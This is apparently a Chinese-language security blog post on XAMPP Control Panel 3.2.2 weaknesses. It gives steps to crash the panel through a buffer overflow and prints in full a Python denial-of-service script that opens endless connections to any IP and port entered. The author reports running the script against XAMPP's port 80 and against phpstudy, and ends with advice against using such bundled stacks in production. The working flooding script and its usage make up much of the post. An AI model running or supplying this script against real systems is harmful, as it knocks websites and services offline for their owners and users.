xampp拒絕服務漏洞
最近在看通用漏洞,發現我們部門網站使用了xampp3.2.2做網站部署,於是在網上搜索xampp,還真找到兩個漏洞。
一個是今年9月出的一個XAMPP Control Panel 3.2.2 Buffer Overflow;另一個是幾年前的一個遠程拒絕服務,發現竟然還能用(?_?)。
#0x01 XAMPP Control Panel 3.2.2 Buffer Overflow
網上共找到兩種Poc:
http://www.vfocus.net/art/20181220/15036.html
http://www.vfocus.net/art/20180917/14798.html
下載運行腳本,會生成一個exploit.txt文件。
在Control Panel裏點擊右上角的config,將exlpoit裏的內容復制到editor和browser裏,保存。
然後點擊查看httpd.conf文件,會彈出崩潰。
崩潰後web進程並沒有中斷,並沒有達成拒絕服務,只是程序崩潰而已,貌似價值不高。
#0x02XAMPP Control Panel - Denial Of Service
找到一個poc:
https://www.anquanke.com/vul/id/1067740
大體意思就是在xampp監聽的這些端口:
(MySQL) 3306 v3.2.2 (Tomcat) 8080 (XAMPP v3.1.0) (FileZilla) 21 (Mercury Mail) 25 (XAMPP v3.1.0),79,105,106,143.
如果發送大量的垃圾數據,就會造成內存崩潰和拒絕服務。
POC:
import socket print "XAMPP Control Panel DOS" print "Discovery: John Page (hyp3rlinx)" print "ApparitionSec" print "hyp3rlinx.altervista.org\r\n" IP = raw_input("[IP]> ") PORT = raw_input("[PORT]> ") arr=[] c=0 while 1: try: arr.append(socket.create_connection((IP,PORT))) arr[c].send("DOOM") print "Die!" c+=1 except socket.error: print "[+] Done! " raw_input() break
對xampp的80端口嘗試攻擊:
效果顯著。中斷腳本後,網站即可恢復。
想到其他建站工具也可能有這種問題,又拿腳本測了下phpstudy,同樣可以實現拒絕服務。
#0x03
怪不得都說網站正式部署最好不要用這些集成工具包,一個是很容易由於默認配置遭到入侵,還有這種dos攻擊。
xampp拒絕服務漏洞